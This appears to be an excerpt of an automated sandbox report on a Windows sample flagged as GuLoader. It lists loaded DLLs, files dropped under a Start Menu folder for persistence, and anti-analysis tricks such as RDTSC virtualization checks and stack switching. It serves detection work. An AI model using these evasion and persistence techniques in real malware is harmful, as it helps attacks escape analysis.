      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Ntwph4urc1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ntwph4urc1.exe, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051193049.00000000365B5000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3053401808.0000000036762000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Ntwph4urc1.exe, 00000006.00000001.2690896248.0000000000649000.00000020.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2691971369.000000000507C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_73F51B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F51B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369409AD push ecx; mov dword ptr [esp], ecx6_2_369409B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Vaabenstyringssystemernes.WarJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chlJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Umpiress240.bivJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\potmaker.stiJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI/Special instruction interceptor: Address: 58B806C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI/Special instruction interceptor: Address: 29A806C
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeRDTSC instruction interceptor: First address: 587AAC2 second address: 587AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF5C0BDF755h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeRDTSC instruction interceptor: First address: 296AAC2 second address: 296AAC2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF5C0B1A5A5h 0x00000006 cmp ah, FFFFFFE4h 0x00000009 cmp ch, ah 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A116A6 rdtsc 6_2_36A116A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI coverage: 0.1 %
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe TID: 4340Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
      Source: Ntwph4urc1.exe, 00000006.00000003.3051505446.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051661184.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093485249.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI call chain: ExitProcess graph end nodegraph_0-4455
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeAPI call chain: ExitProcess graph end nodegraph_0-4301
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A116A6 rdtsc 6_2_36A116A6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369835C0 NtCreateMutant,LdrInitializeThunk,6_2_369835C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 0_2_73F51B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F51B5F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C368C mov eax, dword ptr fs:[00000030h]6_2_369C368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C368C mov eax, dword ptr fs:[00000030h]6_2_369C368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C368C mov eax, dword ptr fs:[00000030h]6_2_369C368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C368C mov eax, dword ptr fs:[00000030h]6_2_369C368C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369376B2 mov eax, dword ptr fs:[00000030h]6_2_369376B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369376B2 mov eax, dword ptr fs:[00000030h]6_2_369376B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369376B2 mov eax, dword ptr fs:[00000030h]6_2_369376B2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D6AA mov eax, dword ptr fs:[00000030h]6_2_3693D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D6AA mov eax, dword ptr fs:[00000030h]6_2_3693D6AA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h]6_2_3694B6C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF6C7 mov eax, dword ptr fs:[00000030h]6_2_369FF6C7
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369716CF mov eax, dword ptr fs:[00000030h]6_2_369716CF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A016CC mov eax, dword ptr fs:[00000030h]6_2_36A016CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A016CC mov eax, dword ptr fs:[00000030h]6_2_36A016CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A016CC mov eax, dword ptr fs:[00000030h]6_2_36A016CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A016CC mov eax, dword ptr fs:[00000030h]6_2_36A016CC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FD6F0 mov eax, dword ptr fs:[00000030h]6_2_369FD6F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h]6_2_369D36EE
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D6E0 mov eax, dword ptr fs:[00000030h]6_2_3696D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D6E0 mov eax, dword ptr fs:[00000030h]6_2_3696D6E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369736EF mov eax, dword ptr fs:[00000030h]6_2_369736EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943616 mov eax, dword ptr fs:[00000030h]6_2_36943616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943616 mov eax, dword ptr fs:[00000030h]6_2_36943616
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36971607 mov eax, dword ptr fs:[00000030h]6_2_36971607
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697F603 mov eax, dword ptr fs:[00000030h]6_2_3697F603
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15636 mov eax, dword ptr fs:[00000030h]6_2_36A15636
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h]6_2_3693F626
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36979660 mov eax, dword ptr fs:[00000030h]6_2_36979660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36979660 mov eax, dword ptr fs:[00000030h]6_2_36979660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369DD660 mov eax, dword ptr fs:[00000030h]6_2_369DD660
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF78A mov eax, dword ptr fs:[00000030h]6_2_369FF78A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A137B6 mov eax, dword ptr fs:[00000030h]6_2_36A137B6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D7B0 mov eax, dword ptr fs:[00000030h]6_2_3696D7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h]6_2_3693F7BA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FD7B0 mov eax, dword ptr fs:[00000030h]6_2_369FD7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FD7B0 mov eax, dword ptr fs:[00000030h]6_2_369FD7B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h]6_2_369CF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h]6_2_369CF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h]6_2_369CF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h]6_2_369CF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h]6_2_369CF7AF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C97A9 mov eax, dword ptr fs:[00000030h]6_2_369C97A9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369457C0 mov eax, dword ptr fs:[00000030h]6_2_369457C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369457C0 mov eax, dword ptr fs:[00000030h]6_2_369457C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369457C0 mov eax, dword ptr fs:[00000030h]6_2_369457C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694D7E0 mov ecx, dword ptr fs:[00000030h]6_2_3694D7E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697F71F mov eax, dword ptr fs:[00000030h]6_2_3697F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697F71F mov eax, dword ptr fs:[00000030h]6_2_3697F71F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0972B mov eax, dword ptr fs:[00000030h]6_2_36A0972B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36945702 mov eax, dword ptr fs:[00000030h]6_2_36945702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36945702 mov eax, dword ptr fs:[00000030h]6_2_36945702
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947703 mov eax, dword ptr fs:[00000030h]6_2_36947703
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1B73C mov eax, dword ptr fs:[00000030h]6_2_36A1B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1B73C mov eax, dword ptr fs:[00000030h]6_2_36A1B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1B73C mov eax, dword ptr fs:[00000030h]6_2_36A1B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1B73C mov eax, dword ptr fs:[00000030h]6_2_36A1B73C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939730 mov eax, dword ptr fs:[00000030h]6_2_36939730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939730 mov eax, dword ptr fs:[00000030h]6_2_36939730
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36975734 mov eax, dword ptr fs:[00000030h]6_2_36975734
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694973A mov eax, dword ptr fs:[00000030h]6_2_3694973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694973A mov eax, dword ptr fs:[00000030h]6_2_3694973A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF72E mov eax, dword ptr fs:[00000030h]6_2_369FF72E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36943720 mov eax, dword ptr fs:[00000030h]6_2_36943720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F720 mov eax, dword ptr fs:[00000030h]6_2_3695F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F720 mov eax, dword ptr fs:[00000030h]6_2_3695F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695F720 mov eax, dword ptr fs:[00000030h]6_2_3695F720
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E375F mov eax, dword ptr fs:[00000030h]6_2_369E375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E375F mov eax, dword ptr fs:[00000030h]6_2_369E375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E375F mov eax, dword ptr fs:[00000030h]6_2_369E375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E375F mov eax, dword ptr fs:[00000030h]6_2_369E375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E375F mov eax, dword ptr fs:[00000030h]6_2_369E375F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36953740 mov eax, dword ptr fs:[00000030h]6_2_36953740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36953740 mov eax, dword ptr fs:[00000030h]6_2_36953740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36953740 mov eax, dword ptr fs:[00000030h]6_2_36953740
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A13749 mov eax, dword ptr fs:[00000030h]6_2_36A13749
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B765 mov eax, dword ptr fs:[00000030h]6_2_3693B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B765 mov eax, dword ptr fs:[00000030h]6_2_3693B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B765 mov eax, dword ptr fs:[00000030h]6_2_3693B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B765 mov eax, dword ptr fs:[00000030h]6_2_3693B765
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36949486 mov eax, dword ptr fs:[00000030h]6_2_36949486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36949486 mov eax, dword ptr fs:[00000030h]6_2_36949486
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B480 mov eax, dword ptr fs:[00000030h]6_2_3693B480
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369374B0 mov eax, dword ptr fs:[00000030h]6_2_369374B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369374B0 mov eax, dword ptr fs:[00000030h]6_2_369374B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369734B0 mov eax, dword ptr fs:[00000030h]6_2_369734B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E74B0 mov eax, dword ptr fs:[00000030h]6_2_369E74B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A114F6 mov eax, dword ptr fs:[00000030h]6_2_36A114F6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A114F6 mov eax, dword ptr fs:[00000030h]6_2_36A114F6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A154DB mov eax, dword ptr fs:[00000030h]6_2_36A154DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E94E0 mov eax, dword ptr fs:[00000030h]6_2_369E94E0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C7410 mov eax, dword ptr fs:[00000030h]6_2_369C7410
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696340D mov eax, dword ptr fs:[00000030h]6_2_3696340D
